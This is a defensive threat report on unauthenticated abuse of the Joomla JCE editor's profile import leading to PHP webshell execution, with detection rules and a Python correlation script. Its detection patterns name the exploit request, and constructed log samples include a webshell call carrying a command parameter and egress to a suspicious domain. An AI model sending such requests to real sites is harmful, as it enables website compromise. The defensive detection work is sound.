[TTD] Joomla Editor Profile Import Abuse and PHP Webshell Execution Exposure
Report Type: TTD
Threat Category: Public-Facing CMS Extension Abuse / PHP Webshell Execution Exposure
Assessment Date: June 17, 2026
Primary Impact Domain: Web Application Integrity and Public-Facing Website Trust
Secondary Impact Domains: Credential Exposure, Hosted Content Integrity, Customer-Facing Service Reliability, Abuse Infrastructure, Incident Response and Recovery
Affected Asset Class: Internet-Facing Joomla Websites Using Vulnerable Joomla Content Editor Extension Versions
Threat Objective Classification: Unauthenticated CMS Profile-State Abuse Leading to Executable Upload Enablement, PHP Payload Placement, Web-Accessible Execution, Credential Access Risk, Hosted-Content Tampering, and Post-Remediation Compromise Validation
Published by: CyberDax LLC
Author: Edward “Tony” Dolley
Role: Founder / Principal Threat Researcher, CyberDax LLC
Publication Date: June 17, 2026
Publication Type: Cybersecurity Research Report / White Paper
BLUF
Joomla websites using vulnerable Joomla Content Editor extension versions are exposed to an actively exploited unauthenticated profile-import abuse path that can allow attackers to create rogue editor profiles, permit executable uploads, upload PHP payloads, and execute those payloads through web-accessible paths. The executive concern is not only whether JCE has been updated, but whether attackers already created rogue profiles, planted PHP files, modified upload behavior, accessed credentials, changed hosted content, or left server-side persistence before remediation.
Executive Risk Translation
This threat converts a trusted CMS editing extension into a server-side execution path. For organizations that depend on Joomla-hosted websites, customer portals, marketing sites, ecommerce pages, documentation sites, or hosted application front ends, compromise can create customer-facing defacement, phishing or malware hosting, credential exposure, database access risk, search-engine reputation damage, abuse-report handling, legal review, and emergency restoration burden. Leadership should treat this as a web integrity and compromise-validation issue, not as a routine CMS patch task.
S5 Executive Risk Summary
Business Risk
JCE profile-import abuse can undermine website integrity, CMS administrative trust, customer-facing content reliability, credential confidentiality, hosting-provider trust, and incident-response confidence. Business impact increases when affected Joomla properties support customer portals, ecommerce, regulated content collection, public communications, authentication-adjacent workflows, or brand-critical web presence.
Technical Cause
The issue involves unauthenticated abuse of Joomla Content Editor profile creation or import behavior that can allow attacker-controlled editor profile state and executable upload behavior. The durable detection issue is the sequence from suspicious JCE profile-import activity into PHP file placement, web-accessible execution, webshell behavior, credential access, content tampering, outbound callbacks, or abuse infrastructure activity.
Threat Posture
This is strategically significant for organizations with internet-facing Joomla sites using vulnerable JCE versions because public exploit logic exists, attacks are automated, active exploitation has been reported, and patching does not clean previously compromised sites. It should be treated as public-facing CMS extension abuse leading to PHP webshell execution exposure, not as a narrow version-compliance issue.
Executive Decision Requirement
Leadership should require immediate JCE update to the fixed release, preservation of web logs before rotation, review of JCE profile state, inspection of writable directories for unexpected PHP files, credential rotation where compromise is suspected, validation of hosted content integrity, malware scanning, backup comparison, WAF tuning, and deployment of the S25 detection logic across web, file, endpoint, WAF, proxy, DNS, hosting-control, and CMS telemetry where available.
S6 Executive Cost Summary
Joomla JCE profile-import abuse creates financial exposure because the organization must determine whether vulnerable public websites were only exposed, actively targeted, or already modified. The cost profile is higher than routine patching when the affected Joomla site supports customer acquisition, ecommerce, support workflows, regulated content, authentication-adjacent functionality, customer communications, or public brand trust.
Response cost is driven by emergency update validation, log preservation, JCE profile review, file-system inspection, PHP webshell hunting, malware scanning, credential rotation, backup comparison, WAF tuning, hosting-provider coordination, abuse-report handling, and customer-impact assessment.
Low Impact Scenario
Estimated $15K - $75K.
This scenario applies where vulnerable JCE exposure or suspicious requests are identified quickly, exploit attempts are blocked or unsuccessful, and web-log review, profile inspection, file-system scanning, and update validation confirm no rogue profile, unexpected PHP artifact, webshell execution, credential access, content tampering, outbound callback, or customer impact.
Moderate Impact Scenario
Estimated $75K - $400K.
This scenario applies where a rogue JCE profile, suspicious profile-import request, unexpected PHP file, suspicious upload-policy change, or uncertain webshell activity is found, but customer data, payment workflows, credentials, hosted content, and databases remain intact after validation. Response may require backup comparison, credential rotation, malware scanning, webroot review, hosting-provider coordination, WAF tuning, content review, and customer-facing assurance.
High Impact Scenario
Estimated $400K - $2.5M+.
This scenario applies where attackers executed PHP payloads, accessed Joomla configuration files, accessed database credentials, modified customer-facing content, hosted phishing or malware, used the server for spam or abuse, affected ecommerce or customer portals, compromised multiple Joomla properties, triggered legal review, required customer notification analysis, or forced emergency rebuild and restoration of web integrity.
S6A Key Cost Drivers
· Number and importance of affected Joomla sites.
· Whether affected sites support ecommerce, customer portals, regulated content, authentication-adjacent workflows, public communications, or brand-critical web presence.
· Evidence of rogue JCE profiles, executable upload settings, unexpected PHP files, webshell access, credential-file access, database access, hosted-content tampering, outbound callbacks, phishing, malware hosting, spam, or abuse reports.
· Availability and retention of web server access logs, WAF logs, reverse-proxy logs, CMS audit logs, file telemetry, endpoint process telemetry, FTP logs, hosting-control logs, DNS logs, and proxy logs.
· Completeness of approved Joomla administrator, approved source, approved scanner, approved maintenance-window, approved deployment-user, and approved hosting-provider inventories.
· Scope of credential rotation for Joomla administrators, database users, FTP users, hosting-control accounts, SSH users, API keys, mail accounts, and reused passwords.
· Business disruption caused by emergency maintenance, site takedown, backup restoration, malware scanning, content validation, SEO cleanup, abuse-desk coordination, or customer communications.
· Customer, contractual, regulatory, or legal exposure if credential access, database access, form-data exposure, payment-page tampering, customer-data access, or malware/phishing hosting cannot be ruled out.
S6B Compliance and Risk Context
Joomla JCE compromise may create compliance, contractual, privacy, payment, customer-notification, operational resilience, or public-trust exposure when attackers access customer data, credentials, databases, contact-form submissions, uploaded documents, mail-related assets, ecommerce records, payment-page content, authentication secrets, or regulated content.
Vulnerable-version status alone is not sufficient for breach determination. The governance question is whether the organization can prove that the site was not modified, backdoored, used for abuse, used to access credentials, or used to reach customer data during the exposure window.
Risk Register Entry
Risk Title
Joomla JCE Profile Import Abuse and PHP Webshell Execution Exposure
Risk Description
Attackers may abuse vulnerable Joomla Content Editor profile import behavior to create rogue editor profiles, permit executable upload types, upload PHP payloads, execute webshells, modify hosted content, access credentials, stage phishing or malware content, and force emergency website integrity review.
Likelihood
High for internet-facing vulnerable JCE deployments.
Impact
Moderate to Severe depending on hosted-content sensitivity, customer-facing dependency, credential exposure, database exposure, and evidence of post-exploitation activity.
Risk Rating
High
Annualized Risk Exposure
Estimated $75K - $500K for organizations with several externally facing Joomla sites and incomplete CMS, file, and web telemetry.
Exposure may exceed $500K - $2.5M+ where compromise affects ecommerce, regulated content, customer portals, multiple hosted Joomla properties, credential material, database access, phishing or malware hosting, abuse-report handling, legal review, customer communications, or public restoration of trust.
S10 Threat Overview
Joomla Content Editor profile-import abuse creates a practical mass-exploitation risk because vulnerable sites can be attacked without authentication, public exploit logic exists, automated attacks have been reported, and patching closes the entry path but does not remove artifacts already created before remediation.
The threat centers on unauthenticated abuse of the JCE profile import workflow. The attacker-created profile state can permit executable upload behavior that should not be available to unauthenticated users. The attacker can then place PHP-like payloads in writable web-accessible locations and request those files over HTTP to trigger server-side execution.
This TTD treats the activity as public-facing CMS extension abuse leading to PHP webshell execution exposure, not as a narrow Joomla patching event.
S13 Targets and Exposure Surface
Primary Targets
Joomla websites using vulnerable Joomla Content Editor extension versions.
JCE profile import functionality.
Joomla public webroots, image folders, media folders, tmp folders, upload directories, cache directories, extension directories, and other writable locations that may be web accessible.
Joomla administrator accounts, database credentials, FTP accounts, hosting-control accounts, SSH accounts, mail accounts, API keys, and reused credentials.
Customer-facing websites, ecommerce pages, forms, portals, documentation sites, marketing pages, and hosted application front ends.
Higher-Risk Deployment Conditions
JCE is internet facing through a public Joomla site.
JCE is outdated or not centrally inventoried.
The site allows PHP execution from writable paths.
Joomla tmp, images, media, uploads, cache, or extension directories are web accessible.
Web logs are short-lived or query strings are not retained.
CMS administrative auditing is absent.
Endpoint process telemetry is unavailable on the web server.
Shared hosting limits access to file, process, FTP, or hosting-control telemetry.
Credential reuse exists across Joomla, database, FTP, hosting-control, mail, or SSH accounts.
Exposure Surface
Public Joomla application routes.
JCE profile-management and import paths.
Requests involving option=com_jce and task=profiles.import.
Writable directories that can receive uploaded files.
Web-accessible PHP execution paths.
Joomla configuration files.
CMS database tables storing editor profile state.
Web server service context.
FTP, hosting-control, file manager, backup, and deployment workflows.
DNS, proxy, firewall, and hosting-provider egress paths.
S17 MITRE ATT&CK Chain Flow Mapping
Stage 1: Public CMS Extension Exposure
The attacker reaches an internet-facing Joomla site running a vulnerable JCE extension version.
· T1190 Exploit Public-Facing Application.
Stage 2: Unauthenticated Profile Import Abuse
The attacker abuses JCE profile import behavior to create or modify editor profile state without valid administrative authentication.
· T1190 Exploit Public-Facing Application.
Stage 3: Executable Upload Enablement and PHP Payload Placement
The attacker uses rogue editor profile behavior to permit PHP or PHP-like file upload into a writable and web-accessible location.
· T1105 Ingress Tool Transfer, applied when payload upload or staging is observed.
Stage 4: Server-Side PHP Execution and Webshell Behavior
The attacker requests the uploaded PHP-like file over HTTP and causes server-side execution from the web server context.
· T1505.003 Server Software Component: Web Shell.
· T1059.004 Command and Scripting Interpreter: Unix Shell, applied when shell execution is observed.
Stage 5: Credential, Content, and Hosting Abuse
The attacker may inspect Joomla configuration files, database credentials, webroot content, mail settings, hosted pages, backups, or other local files.
· T1552.001 Unsecured Credentials: Credentials In Files.
· T1083 File and Directory Discovery.
· T1005 Data from Local System.
Stage 6: Customer-Facing Impact or Abuse Infrastructure
The attacker may modify hosted content, place phishing pages, host malware, create redirects, send spam, or damage public trust.
· T1491.002 Defacement: External Defacement, applied when public-facing content is altered.
· T1565.002 Stored Data Manipulation, applied when hosted files, CMS content, or deployment artifacts are modified.
Conditional Technique Notes
T1105 should only be applied where upload, staging, or transfer behavior is observed.
T1059.004 should only be applied where command execution, shell invocation, or interpreter execution is observed.
T1491.002 should only be applied where public-facing content is modified or defaced.
This TTD should not be mapped to ransomware, APT-specific techniques, or broad cloud-control-plane activity unless supporting telemetry connects those behaviors to the Joomla/JCE access path.
S18 Attack Path Narrative
An attacker identifies an internet-facing Joomla site using a vulnerable JCE extension version.
The attacker targets the JCE profile import workflow with unauthenticated requests involving JCE profile creation or import behavior.
The attacker creates or imports a rogue editor profile that enables upload of PHP or PHP-like content.
The attacker uploads a PHP payload into a writable path such as tmp, images, media, uploads, cache, or another web-accessible directory.
The attacker requests the uploaded PHP-like file over HTTP and triggers server-side execution.
The attacker may use the webshell to inspect Joomla configuration files, retrieve database credentials, modify hosted content, upload additional files, create persistence, stage phishing or malware content, generate outbound callbacks, or use the server for abuse infrastructure.
Defenders should detect this through correlated JCE profile-import requests, rogue CMS profile state, unexpected PHP files in writable paths, HTTP access to newly written PHP-like files, web server process anomalies, suspicious outbound communication, credential-file access, and hosted-content changes.
S20 TTP Analysis
Initial Access
Attackers abuse public-facing Joomla/JCE exposure without needing valid CMS credentials.
Execution
Execution occurs when a PHP-like payload is uploaded to a web-accessible location and requested through the web server, causing server-side PHP execution.
Persistence
Persistence may occur through rogue JCE profiles, additional PHP webshells, modified CMS files, hidden plugins, cron jobs, altered templates, malicious redirects, new administrator accounts, or hosting-control changes.
Privilege Escalation
Privilege escalation may occur if the web server user can read sensitive configuration files, write to executable locations, access database credentials, or interact with hosting-control tooling.
Defense Evasion
Attackers may use benign-looking profile names, normal Joomla paths, common upload directories, obfuscated PHP, double extensions, timestamp manipulation, temporary webshells, cleanup attempts, or web requests that resemble scanner or maintenance activity.
Credential Access
Attackers may access Joomla configuration files, database credentials, FTP credentials, hosting-control credentials, mail settings, API keys, environment files, backup archives, or reused passwords.
Discovery
Attackers may inspect directories, Joomla version state, extension versions, database tables, administrator users, content paths, writable locations, backup files, mail configuration, and hosting environment details.
Command and Control / Tool Transfer
Attackers may upload additional tooling, fetch remote payloads, connect to external infrastructure, or use the compromised site as a callback point.
Impact
Attackers may alter public content, host phishing or malware, inject redirects, stage spam infrastructure, compromise customer trust, damage SEO reputation, access customer data, or force emergency site restoration.
S20A Adversary Tradecraft Summary
The durable tradecraft pattern is CMS profile-state conversion: unauthenticated JCE profile import abuse enables executable upload behavior, which is then converted into PHP payload placement, web-accessible execution, webshell activity, credential exposure, content tampering, or abuse infrastructure. Detection should focus on that sequence rather than a single CVE label, exploit string, scanner result, IP address, user agent, or file hash.
S21 Detection Strategy Overview
Detection Philosophy
Detect Joomla JCE exploitation through correlated behavior, not single indicators.
Primary Detection Anchors
Suspicious JCE profile-import requests, unauthenticated or unusual POST activity, new or modified JCE editor profiles, executable upload policy changes, PHP-like files in writable Joomla paths, HTTP access to recently created PHP-like files, web server service-context execution, sensitive Joomla file access, rare outbound communication, FTP or hosting-control anomalies, and hosted-content changes.
Detection Prioritization Model
Prioritize events where JCE profile-import activity is followed by PHP-like file placement, web access to that file, web server process execution, credential-file access, outbound callbacks, or hosted-content changes within a bounded time window.
Correlation Strategy (Strict Enforcement)
Do not promote scanner traffic, one request to com_jce, one unexpected PHP file, or cloud-only anomalies to high confidence without Joomla asset, request, file, process, CMS profile, source, user, or time-window correlation.
Telemetry Prioritization
Prioritize web access logs, WAF logs, reverse-proxy logs, CMS profile state, Joomla database change records, file-integrity telemetry, endpoint process telemetry, DNS logs, proxy logs, firewall logs, FTP logs, hosting-control logs, backup metadata, and asset inventory.
Detection Design Constraints
Avoid detection designs based only on CVE name, single request string, public exploit user agent, one IOC, vulnerable version status, or isolated scanner traffic.
Baseline and Deployment Requirements
Baseline approved administrators, admin source networks, hosting-provider support sources, vulnerability scanners, patch-validation tools, backup and migration jobs, deployment users, CI/CD upload workflows, maintenance windows, known PHP paths, normal Joomla extension behavior, and expected egress destinations.
Variant Resilience Requirements
Rules should remain useful for future Joomla/JCE or CMS extension abuse paths that produce the same operational behavior: profile or configuration abuse, executable upload enablement, suspicious PHP placement, webshell execution, credential access, and hosted-content tampering.
Operational Detection Model
Run detections in hunt mode first, tune exceptions, validate joins, verify triage fields, confirm web-log retention and query-string preservation, baseline approved administrative activity, then promote to alert mode.
Explicit Non-Deployment Guardrails
Do not deploy weak WAF-only rules as compromise detection. Do not claim webshell execution from vulnerable version status alone. Do not claim confirmed compromise from scanner traffic, generic web errors, unrelated PHP files, or uncorrelated outbound traffic. Do not attribute cloud, email, or hosting-control anomalies to JCE compromise without Joomla host, identity, source, file, or time-window linkage.
S22 Primary Detection Signals
Primary Detection Signals
POST requests involving option=com_jce and task=profiles.import.
JCE profile import requests from unauthenticated, unusual, external, or non-administrative sources.
JCE profile creation or modification outside approved maintenance.
JCE profiles permitting PHP, phtml, phar, or other executable file types.
Unexpected PHP-like files in tmp, images, media, uploads, cache, extension, template, or other writable paths.
HTTP GET or POST access to newly created PHP-like files in writable directories.
Web server service account spawning shell, scripting, transfer, archive, or network tools.
Access to Joomla configuration files, backup files, environment files, database dumps, or credential-bearing files after suspicious profile import or PHP access.
Supporting Detection Signals
Unusual user agents around profile import and PHP access.
HTTP 200, 206, 302, 403, 404, or 500 response patterns around import and execution attempts.
Repeated failed upload, profile import, or webshell-access attempts.
Outbound DNS, proxy, firewall, or EDR network activity from Joomla hosts to newly seen, rare, suspicious, or unapproved destinations.
FTP, file manager, hosting-control, or backup activity near suspicious web events.
New administrator accounts, modified templates, plugin changes, redirect changes, or unexpected CMS content updates.
Exploit Attempt and Instability Signals
Repeated requests to com_jce or profile import endpoints.
Unusual HTTP status patterns around JCE import requests.
Scanner-like activity followed by PHP file access.
Access to temporary file paths, uploaded archive paths, or PHP-like files with double extensions.
Outbound Communication Signals
DNS, proxy, firewall, or EDR network activity from Joomla web servers to rare, newly registered, unknown, suspicious, or unapproved destinations after suspicious PHP access.
Persistence and Post-Exploitation Signals (Conditional)
New or modified PHP files, templates, plugins, administrator accounts, scheduled tasks, cron entries, hidden files, backup archives, redirects, .htaccess rules, mail scripts, or webshell variants.
Lateral Movement and Expansion Signals (Conditional)
Use of Joomla, FTP, database, hosting-control, SSH, mail, or reused credentials against adjacent infrastructure.
Signal Usage Constraints
Do not treat a single signal as compromise confirmation. Promote confidence when signals align by Joomla asset, virtual host, source IP, user, path, file, process, destination, profile state, and time window.
S23 Telemetry Requirements
Required Telemetry
Web server access logs.
WAF logs.
Reverse-proxy logs.
Load-balancer logs where applicable.
Joomla asset inventory.
Installed JCE version inventory.
URI and query-string preservation.
Source IP and forwarded source IP fields.
HTTP method, URI path, query string, status code, user agent, request size, response size, virtual host, backend host, and timestamp.
File telemetry for Joomla webroot, images, media, tmp, upload, cache, template, plugin, extension, and backup paths.
Approved Joomla administrator lookup.
Approved administrator source-network lookup.
Approved scanner and validation-source lookup.
Approved hosting-provider support-source lookup.
Approved maintenance-window lookup.
Strongly Recommended Telemetry
Joomla administrative audit logs.
Joomla database change records for JCE profile state.
EDR or Linux audit telemetry from Joomla hosts.
Process creation and command-line telemetry.
File creation, modification, rename, read, and delete telemetry.
DNS logs.
Proxy logs.
Firewall logs.
EDR network telemetry.
FTP logs.
Hosting-control logs.
File-manager logs.
Backup and restore logs.
Database access logs.
Mail logs.
CMDB records.
Hosting-provider asset mapping.
Recently seen domain enrichment.
Domain reputation enrichment.
Known-good webroot baseline.
Approved deployment-user lookup.
Approved PHP path inventory.
Approved egress-destination lookup.
Local Mapping Required
Joomla site identifier.
Virtual host.
Backend host.
Source IP.
Forwarded source IP.
Authenticated CMS user where available.
HTTP method.
URI path.
Query string.
Status code.
User agent.
JCE profile identifier.
JCE profile name.
JCE upload policy.
File path.
File extension.
File hash where available.
File owner.
File action.
Process name.
Parent process.
Command line.
Process user.
Destination domain.
Destination IP.
FTP user.
Hosting-control user.
Maintenance-window status.
Approved administrator status.
Approved scanner status.
Approved deployment-user status.
Approved hosting-provider status.
Approved egress-destination status.
S24 Detection Opportunities and Gaps
Detection Opportunities
Suspicious JCE profile import activity can be correlated with PHP-like file placement, HTTP access to the file, web server process execution, sensitive file access, and outbound communication.
CMS profile-state review may directly identify rogue JCE profiles or executable upload policy changes.
File telemetry may reveal PHP payload creation even when web logs are incomplete.
WAF and reverse-proxy logs may preserve request-path evidence when application logs are incomplete.
Endpoint telemetry may reveal webshell execution through web server process lineage.
FTP, hosting-control, and backup logs may reveal post-exploitation cleanup, persistence, or restoration activity.
Detection Gaps
Web logs may rotate quickly.
Query strings may not be logged.
Joomla administrative audit logs may be absent.
CMS profile state may require database inspection rather than native audit telemetry.
Shared hosting may not expose process or file telemetry.
File timestamps may be unreliable after restore, migration, or attacker modification.
PHP execution restrictions vary by hosting configuration.
Endpoint telemetry may be unavailable on commodity web hosting.
Cloud logs alone cannot prove Joomla/JCE exploitation.
Compensating Controls
Use WAF logs, reverse-proxy logs, web server logs, CMS profile inspection, database review, file-system scanning, backup comparison, EDR, Linux audit, FTP logs, hosting-control logs, DNS logs, proxy logs, firewall logs, approved inventories, and maintenance records.
Do not rely only on JCE version validation if suspicious activity occurred during the exposure window.
S25 Ultra-Tuned Detection Engineering Rules
NDR / Network Behavioral Analytics
Detection Viability Assessment
Production-deployable where HTTP request metadata, WAF logs, reverse-proxy logs, URI paths, query strings, response status, virtual host, backend host, source identity, and egress telemetry can be joined to the same Joomla asset. Pure NetFlow is not sufficient because this detection requires JCE-specific URI and query-string visibility. Use NDR as a correlation layer when it can consume WAF, proxy, HTTP metadata, DNS, and asset-enrichment data.
Rule
Joomla JCE Profile Import Request With PHP Access or Rare Egress Correlation
Rule Format
Production-deployable NDR / WAF / reverse-proxy behavioral correlation pattern requiring local query-language translation.
Detection Purpose
Detect suspicious JCE profile import activity that aligns with PHP-like file access in writable Joomla paths, abnormal source context, suspicious response patterns, or rare outbound communication from the same Joomla host.
Detection Logic
Trigger when a Joomla asset receives POST activity involving option=com_jce and task=profiles.import from a source that is not an approved Joomla administrator source, approved scanner, hosting-provider support source, or approved validation workflow.
Assign medium severity when suspicious JCE profile-import activity occurs against a Joomla/JCE asset.
Assign high severity when suspicious JCE profile-import activity is followed within 60 minutes by HTTP access to a PHP-like file in tmp, images, media, uploads, cache, templates, plugins, or other writable paths on the same virtual host or backend host.
Assign high severity when suspicious JCE profile-import activity includes unusual source context, suspicious user agent, repeated failure-to-success pattern, or abnormal HTTP status sequence.
Promote to critical when suspicious JCE profile-import activity is followed within 120 minutes by rare outbound communication from the Joomla host, endpoint-confirmed web server process execution, sensitive file access, FTP or hosting-control abuse, hosted-content modification, phishing or malware hosting, or confirmed webshell artifact discovery.
Required Telemetry
WAF logs.
Reverse-proxy logs.
Load-balancer logs.
Web access logs.
HTTP request metadata.
DNS logs.
Proxy logs.
NDR session telemetry.
Joomla/JCE asset inventory.
Virtual host to backend host mapping.
Approved Joomla administrator source lookup.
Approved scanner lookup.
Approved hosting-provider support-source lookup.
Approved maintenance-window lookup.
Approved egress-destination lookup.
Recently seen destination-domain baseline.
Engineering Implementation Instructions
Map http_method, uri_path, query_string, full_url, source_ip, x_forwarded_for, user_agent, http_status, request_size, response_size, virtual_host, backend_host, backend_ip, joomla_site_id, src_host, dest_domain, dest_ip, dns_query, proxy_action, and timestamp.
Build ASSET_GROUP("joomla_jce_sites") from CMDB records, vulnerability management inventory, web platform inventory, DNS records, reverse-proxy routing, load-balancer target groups, cloud tags, hosting-provider records, and JCE version records.
Create APPROVED_JOOMLA_ADMIN_SOURCES, APPROVED_JOOMLA_SCANNERS, APPROVED_HOSTING_PROVIDER_SOURCES, APPROVED_JOOMLA_MAINTENANCE_WINDOWS, APPROVED_JOOMLA_VALIDATION_SOURCES, and APPROVED_JOOMLA_EGRESS_DESTINATIONS.
Validate that WAF, reverse proxy, CDN, load balancer, or web server logs preserve URI paths and query strings before enabling high-severity logic.
Translate the query pattern into the target NDR, WAF, SIEM, proxy, or detection platform syntax using local lookup and join functions.
Treat TLS termination, URI visibility, backend-host joins, virtual-host mapping, source-IP preservation, egress baselining, allowlist tuning, and SOC triage routing as required local deployment work.
DRI Assessment
High resilience where full URI/query visibility, Joomla asset inventory, virtual-host mapping, DNS/proxy telemetry, approved-source enrichment, and rare-destination baselining are available.
DRI
8.6 / 10
TCR Assessment
Operational confidence is moderate for standalone suspicious profile-import activity and high when profile-import activity aligns with PHP-like file access, rare egress, endpoint execution, CMS profile changes, or file-system evidence.
Operational TCR
8.1 / 10
Full-Telemetry TCR
9.2 / 10
Limitations
Encrypted traffic without WAF, reverse-proxy, CDN, or server-side HTTP logging may hide JCE URI and query strings. Attackers may use separate infrastructure for upload and execution. Legitimate validation, emergency remediation, or scanner workflows may touch JCE paths. Critical promotion requires local correlation to PHP access, file telemetry, endpoint telemetry, rare egress, CMS profile state, or hosting-control evidence.
Detection Query Pattern
Production-deployable behavioral pattern pending local query-language translation:
DATASETS:
ENV_WAF
ENV_REVERSE_PROXY
ENV_LOAD_BALANCER
ENV_WEB_ACCESS
ENV_DNS
ENV_PROXY
SCOPE:
backend_host IN ASSET_GROUP("joomla_jce_sites")
WINDOW:
60 minutes
SIGNAL suspicious_jce_profile_import:
http_method = "POST"
AND (
full_url CONTAINS "option=com_jce"
OR query_string CONTAINS "option=com_jce"
)
AND (
full_url CONTAINS "task=profiles.import"
OR query_string CONTAINS "task=profiles.import"
)
AND source_ip NOT IN LOOKUP("APPROVED_JOOMLA_ADMIN_SOURCES")
AND source_ip NOT IN LOOKUP("APPROVED_JOOMLA_SCANNERS")
AND source_ip NOT IN LOOKUP("APPROVED_HOSTING_PROVIDER_SOURCES")
AND maintenance_window = false
SIGNAL writable_path_php_access:
backend_host IN ASSET_GROUP("joomla_jce_sites")
AND http_method IN ("GET","POST")
AND uri_path MATCHES "(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)"
AND http_status IN (200,206,302,403,404,500)
SIGNAL rare_joomla_host_egress:
src_host IN ASSET_GROUP("joomla_jce_sites")
AND dest_domain NOT IN LOOKUP("APPROVED_JOOMLA_EGRESS_DESTINATIONS")
AND dest_domain NOT IN LOOKUP("APPROVED_BUSINESS_DOMAINS")
AND (
dest_domain_age_days < ENV_NEW_DOMAIN_AGE_DAYS
OR domain_reputation IN ("unknown","suspicious","malicious")
OR dest_country NOT IN LOOKUP("APPROVED_EGRESS_COUNTRIES")
)
AND proxy_action IN ("allowed","proxied","connected")
CORRELATION:
suspicious_jce_profile_import NEAR (
writable_path_php_access
OR rare_joomla_host_egress
)
BY backend_host, virtual_host
WITHIN 60 minutes
OUTPUT:
backend_host
virtual_host
source_ip
x_forwarded_for
user_agent
uri_path
query_string
http_method
http_status
request_size
response_size
dest_domain
dest_ip
first_seen
last_seen
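The three SIGNAL blocks and the NEAR correlation above, run offline over constructed log lines. This is an added example for this report, not the production query and not Joomla or JCE code: it parses an assumed reverse-proxy log layout (timestamp, backend host, virtual host, source IP, request line, status), applies the predicates with constructed allowlists standing in for the LOOKUP tables, and pairs an import with execution-side evidence inside a sliding 60-minute window keyed by backend host and virtual host. The asset group, allowlist contents, domain-age, reputation and country fields on the proxy records, and every sample line are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# Added example: offline model of the pattern above. Hosts, lookups, log
# lines and proxy records are constructed for illustration.
WINDOW = timedelta(minutes=60)
PHP_STATUSES = {200, 206, 302, 403, 404, 500}
WRITABLE_PHP = re.compile(
    r"(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/)"
    r".*(\.php|\.phtml|\.phar|php\.)", re.I)
ASSET_GROUP = {"web-01", "web-02", "web-03"}              # joomla_jce_sites
APPROVED_SOURCES = [ip_network(n) for n in              # admin, scanner, hosting lookups
                    ("10.20.0.0/16", "192.0.2.50/32", "198.18.0.0/15")]
APPROVED_JOOMLA_EGRESS_DESTINATIONS = {"update.joomla.org", "cdn.joomla.org"}
APPROVED_BUSINESS_DOMAINS = {"example.com"}
APPROVED_EGRESS_COUNTRIES = {"US", "DE"}
# Assumed proxy log layout: ts backend_host virtual_host src_ip "METHOD url" status
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<backend>\S+) (?P<vhost>\S+) (?P<src>\S+) '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3})$')


def web_signals(lines, maintenance_window=False):
    """SIGNAL suspicious_jce_profile_import and SIGNAL writable_path_php_access."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["backend"] not in ASSET_GROUP:
            continue
        ts, parts = datetime.fromisoformat(m["ts"]), urlsplit(m["url"])
        q = parse_qs(parts.query)       # decodes %-encoding, unlike a raw CONTAINS
        key, src = (m["backend"], m["vhost"]), ip_address(m["src"])
        if (m["method"] == "POST" and "com_jce" in q.get("option", [])
                and "profiles.import" in q.get("task", [])
                and not maintenance_window
                and not any(src in net for net in APPROVED_SOURCES)):
            out.append(("suspicious_jce_profile_import", key, ts, line))
        if (m["method"] in ("GET", "POST") and WRITABLE_PHP.search(parts.path)
                and int(m["status"]) in PHP_STATUSES):
            out.append(("writable_path_php_access", key, ts, line))
    return out


def egress_signals(records):
    """SIGNAL rare_joomla_host_egress over proxy/DNS records (dicts)."""
    out = []
    for r in records:
        dom = r["dest_domain"]
        registered = ".".join(dom.rsplit(".", 2)[-2:])
        if (r["src_host"] not in ASSET_GROUP
                or r["proxy_action"] not in ("allowed", "proxied", "connected")
                or dom in APPROVED_JOOMLA_EGRESS_DESTINATIONS
                or registered in APPROVED_BUSINESS_DOMAINS):
            continue
        if (r["dest_domain_age_days"] < 30
                or r["domain_reputation"] in ("unknown", "suspicious", "malicious")
                or r["dest_country"] not in APPROVED_EGRESS_COUNTRIES):
            # Proxy records carry no virtual host: key joins on backend host only.
            out.append(("rare_joomla_host_egress", (r["src_host"], None),
                        datetime.fromisoformat(r["ts"]), dom))
    return out


def correlate(signals):
    """CORRELATION: import NEAR (php access OR rare egress) within a sliding WINDOW."""
    imports = [s for s in signals if s[0] == "suspicious_jce_profile_import"]
    evidence = [s for s in signals if s[0] != "suspicious_jce_profile_import"]
    alerts = []
    for _, (backend, vhost), t0, line in imports:
        near = [e for e in evidence if e[1][0] == backend
                and e[1][1] in (None, vhost) and abs(e[2] - t0) <= WINDOW]
        if near:
            times = [t0] + [e[2] for e in near]
            alerts.append({"backend_host": backend, "virtual_host": vhost,
                           "signals": sorted({e[0] for e in near} | {"suspicious_jce_profile_import"}),
                           "first_seen": min(times), "last_seen": max(times),
                           "evidence": [line] + [e[3] for e in near]})
    return alerts


SAMPLE_LOG = [  # constructed lines; web-02's import comes from the approved scanner
    '2026-06-17T10:05:00 web-01 shop.example.com 203.0.113.7 "POST /index.php?option=com_jce&task=profiles.import" 200',
    '2026-06-17T10:07:00 web-01 shop.example.com 203.0.113.8 "GET /images/banner.jpg" 200',
    '2026-06-17T10:09:30 web-01 shop.example.com 203.0.113.7 "GET /images/stories/cache.php?c=id" 200',
    '2026-06-17T11:00:00 web-02 blog.example.com 192.0.2.50 "POST /index.php?option=com_jce&task=profiles.import" 200',
    '2026-06-17T11:10:00 web-02 blog.example.com 198.51.100.9 "GET /images/x.php" 404',
    '2026-06-17T12:00:00 web-03 docs.example.com 198.51.100.20 "POST /index.php?option=com%5Fjce&task=profiles.import" 200',
]
SAMPLE_EGRESS = [  # constructed proxy records for web-03
    {"ts": "2026-06-17T12:20:00", "src_host": "web-03", "dest_domain": "cdn-update-check.xyz",
     "dest_domain_age_days": 3, "domain_reputation": "unknown", "dest_country": "US", "proxy_action": "allowed"},
    {"ts": "2026-06-17T12:21:00", "src_host": "web-03", "dest_domain": "update.joomla.org",
     "dest_domain_age_days": 5000, "domain_reputation": "good", "dest_country": "US", "proxy_action": "allowed"},
]


def run(lines=SAMPLE_LOG, records=SAMPLE_EGRESS):
    return correlate(web_signals(lines) + egress_signals(records))
```

Two choices depart from the literal pattern on purpose. The option and task parameters are checked after query-string decoding, so the percent-encoded option=com%5Fjce on the web-03 line still matches, which a raw substring CONTAINS would miss; and egress evidence joins on backend host alone because proxy and DNS records do not carry the virtual host named in the BY clause, so that join needs the backend-host mapping called out under the engineering instructions.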
SentinelOne
Detection Viability Assessment
